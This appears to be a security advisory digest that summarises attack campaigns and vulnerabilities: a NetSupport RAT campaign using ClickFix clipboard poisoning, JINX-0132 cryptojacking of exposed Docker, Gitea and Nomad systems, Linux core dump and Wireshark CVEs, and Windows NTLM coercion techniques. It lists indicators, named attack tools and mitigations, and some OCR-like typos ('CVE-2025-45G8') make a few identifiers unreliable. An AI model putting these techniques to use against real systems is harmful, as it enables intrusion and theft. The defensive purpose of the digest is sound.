https://thehackernews.com/2025/06/chaos-rat-malware-targets-windows-and.html
NetSupport RAT Delivered via Fake DocuSign and Gitcode Sites Using Multi-Stage PowerShell Attacks
A new campaign is leveraging counterfeit DocuSign and Gitcode websites to distribute NetSupport RAT through a sophisticated, multi-stage PowerShell attack chain. The operation relies on social engineering to trick users into executing malicious scripts,
ultimately granting attackers remote access to compromised systems.
Key Details:
- Malware: NetSupport RAT (legitimate remote administration tool abused for malicious purposes)
Delivery Method:
- Fake DocuSign and Gitcode sites prompt users to complete a CAPTCHA or follow instructions, which covertly copies an obfuscated PowerShell command to the clipboard (clipboard poisoning).
- Victims are instructed to paste and run the script via the Windows Run dialog, initiating the infection chain.
Attack Flow:
- Initial PowerShell script downloads a secondary script from an external server (e.g., tradingviewtool[.]com).
- Subsequent scripts fetch additional payloads, including a persistence mechanism (“wbdims.exe”) and a ZIP archive containing “jp2launcher.exe.”
- The final stage executes NetSupport RAT, granting attackers remote control.
Evasion Techniques:
- Multi-stage scripting to bypass detection and complicate analysis
- Use of legitimate tools (NetSupport Manager) to blend in with normal administrative activity
- ClickFix-style CAPTCHAs and social engineering to increase user compliance
Associated Infrastructure:
- Malicious domains include:
- tradingviewtool[.]com
- docusign.sa[.]com
Mitigation/Workaround:
- Educate users to avoid running scripts or commands from untrusted websites, especially those received via email or social media.
- Monitor for clipboard manipulation and suspicious PowerShell activity on endpoints.
- Block access to known malicious domains and monitor for connections to suspicious infrastructure.
- Deploy endpoint protection with behavioral analysis to detect multi-stage script execution and RAT deployment.
- Regularly review and restrict the use of legitimate remote administration tools within the environment.
References:
https://thehackernews.com/2025/06/fake-docusign-gitcode-sites-spread.html
1G. Cryptojacking Canpaign Exploits DevOps APIs and Open WebUI Systens
A new cryptojacking campaign, tracked as JINX-0132, is targeting publicly accessible
DevOps infrastructure—including Docker, Gitea, HashiCorp Consul, and Nomad servers— to deploy cryptocurrency miners. Attackers are leveraging misconfigurations and known vulnerabilities, using off-the-shelf tools from GitHub to evade attribution and detection.
Key Details:
- Targets: Publicly exposed Docker, Gitea, Consul, Nomad, and Open WebUI systems
Attack Methods:
- Exploits Docker API to spin up containers running XMRig miners
- Exploits Docker API to spin up containers running XMRig miners
- Leverages Gitea misconfigurations (e.g., INSTALL_LOCK=false, RCE via git hooks)
- Abuses Consul’s service registration and health checks for code execution
- Exploits Nomad’s insecure default API to create jobs that download and run XMRig miners
- Uses Open WebUI’s plugin system to upload and execute malicious Python scripts
Payloads:
- XMRig and T-Rex cryptocurrency miners
- Java-based loaders and infostealers (on Windows)
- Linux persistence via systemd services and process hiding libraries (processhider, argvhider)
- Windows infostealer targeting Discord and Chrome wallet extensions
Observed Infrastructure:
- Downloaded tools and payloads directly from GitHub repositories
- C2 and payload hosting via Discord webhooks and IP 185.208.159[.]155
Mitigation/Workaround:
- Audit and secure all DevOps and cloud management interfaces; restrict public access
- Apply security patches and enforce strong authentication for Docker, Gitea, Consul, Nomad, and Open WebUI
- Monitor for unauthorized container creation, suspicious jobs, or plugin uploads
- Use process monitoring to detect hidden mining activity and infostealer behavior
- Remove unnecessary internet exposure for all management and training systems
- Educate teams about the risks of misconfiguration and the importance of regular security reviews
References:
https://thehackernews.com/2025/06/cryptojacking-campaign-exploits-devops.html
Linux Core Dunp Flaws Enable Password Hash Theft in Ubuntu, RHEL, and Fedora
Two newly disclosed vulnerabilities in Linux core dump handlers—apport (Ubuntu) and systemd-coredump (RHEL, Fedora)—could allow local attackers to extract sensitive information, including password hashes, from privileged process memory. These race condition bugs, tracked as CVE-2025-5054 and CVE-2025-4598, highlight the risks of improper core dump handling in multi-user environments.
Key Details:
- CVE-2025-5054 (CVSS 4.7):
- Affects Canonical apport up to 2.32.0
- Race condition allows a local attacker to exploit PID reuse and Linux namespaces to access core dumps from privileged processes
CVE-2025-45G8 (CVSS 4.7):
- Affects systemd-coredump
- Attackers can force a SUID process to crash, then quickly replace it with a non-SUID binary using the same PID, gaining access to the original core dump and potentially reading sensitive data such as /etc/shadow password hashes
Attack Scenario:
- Exploiting these flaws requires local access and the ability to win a race condition, but successful attacks can expose password hashes, encryption keys, or other
confidential data from core dumps.
Inpacted Systens:
- Ubuntu (apport)
- RHEL, Fedora (systemd-coredump)
- Debian is not affected by CVE-2025-4598 by default unless systemd-coredump is manually installed
- Amazon Linux and Gentoo have issued similar advisories
Mitigation/Workaround:
- Apply security updates for apport and systemd-coredump as soon as available
- As an immediate mitigation, disable core dumps for SUID binaries by running:
- echo 0 > /proc/sys/fs/suid_dumpable
(Note: This will prevent crash analysis for SUID binaries but blocks the attack vector.)
- Enforce strict access controls and monitor for suspicious local activity
- Regularly audit system configurations and restrict unnecessary local user accounts
References:
https://thehackernews.com/2025/05/new-linux-flaws-allow-password-hash.html
Wireshark Vulnerability Enables DoS via Malicious Packet Injection (CVE-2025- 5601)
A critical vulnerability in Wireshark, the widely used network protocol analyzer, could allow attackers to trigger denial-of-service (DoS) attacks by injecting malformed packets or
distributing corrupted capture files. The flaw, tracked as CVE-2025-5601 (wnpa-sec-2025- 02, CVSS 7.8), affects millions of users and has significant implications for organizations relying on Wireshark for network monitoring and incident response.
Key Details:
- CVE: CVE-2025-5601
- Severity: High (CVSS 7.8)
- Vulnerability Type: Buffer overflow (CWE-120) in the column utility module
Affected Versions:
- Wireshark 4.4.0 through 4.4.6
- Wireshark 4.2.0 through 4.2.12
Attack Vectors:
- Injection of malformed packets into monitored network traffic
- Distribution of malicious packet capture files to Wireshark users
Inpact:
- Successful exploitation causes Wireshark to crash, disrupting network analysis and monitoring operations
- Potential to impact real-time security monitoring and incident response in enterprise environments
Mitigation/Workaround:
- Upgrade immediately to Wireshark version 4.4.7 or 4.2.12, which contain patches for this vulnerability
- Only open capture files from trusted sources
- Limit packet capture operations to trusted network segments
- Implement network segmentation to reduce exposure
- Review and update network monitoring security protocols regularly
References:
https://www.wireshark.org/security/wnpa-sec-2025-02.html https://nvd.nist.gov/vuln/detail/CVE-2025-5601
Windows Authentication Coercion Attacks Threaten Enterprise Networks
Authentication coercion attacks remain a significant risk to enterprise Active Directory environments, enabling attackers with limited privileges to escalate to domain-wide administrative access. Despite Microsoft’s ongoing security enhancements, these
techniques continue to evolve and exploit gaps in Windows authentication protocols and service configurations.
Key Details:
- Attack Techniques:
- Abuse of Remote Procedure Call (RPC) interfaces such as MS-RPRN (PrinterBug), MS-EFSR (PetitPotam), MS-DFSNM (DFS Coercion), and MS- WSP (WSP Coercion)
- Coercion of Windows computer accounts to authenticate with attacker- controlled systems, enabling credential relay and privilege escalation
- Exploitation of legitimate Windows services, including printer management and encrypted file services, to trigger authentication flows
Recent Developnents:
- Attack tools (e.g., ntlmrelayx.py) have been updated to bypass Microsoft’s mitigations by leveraging new RPC server capabilities
- Automated modules (e.g., NetExec efsr_spray) can activate vulnerable services and exploit SMB shares, including printer queues
- HTTP-based coercion remains viable via the WebClient service and
.searchConnector-ms files on accessible shares
Microsoft Protections:
- Extended Protection for Authentication (EPA), LDAP channel binding, and SMB signing are now enabled by default on new Windows Server and
Windows 11 installations
- Upgraded systems may retain legacy configurations, leaving them exposed
- Some mitigations, such as disabling unencrypted AD CS Web Enrollment APIs, are only active on fresh installs
Inpact:
- Attackers can impersonate computer accounts, abuse S4U2Self and Resource- Based Constrained Delegation (RBCD), and potentially gain DCSync privileges for full domain compromise
- Kerberos relaying attacks are expected to become more prominent as NTLM is phased out
Mitigation/Workaround:
- Enforce SMB signing and LDAP channel binding across all Windows systems, not just new installations
- Audit and disable unnecessary services, especially WebClient, on all endpoints
- Regularly review and update group policies to ensure modern authentication protections are in place
- Monitor for suspicious authentication attempts and RPC activity, particularly involving computer accounts
- Educate IT teams on evolving coercion and relay attack techniques and ensure prompt application of security updates
References:
https://cybersecuritynews.com/windows-authentication-coercion-attacks/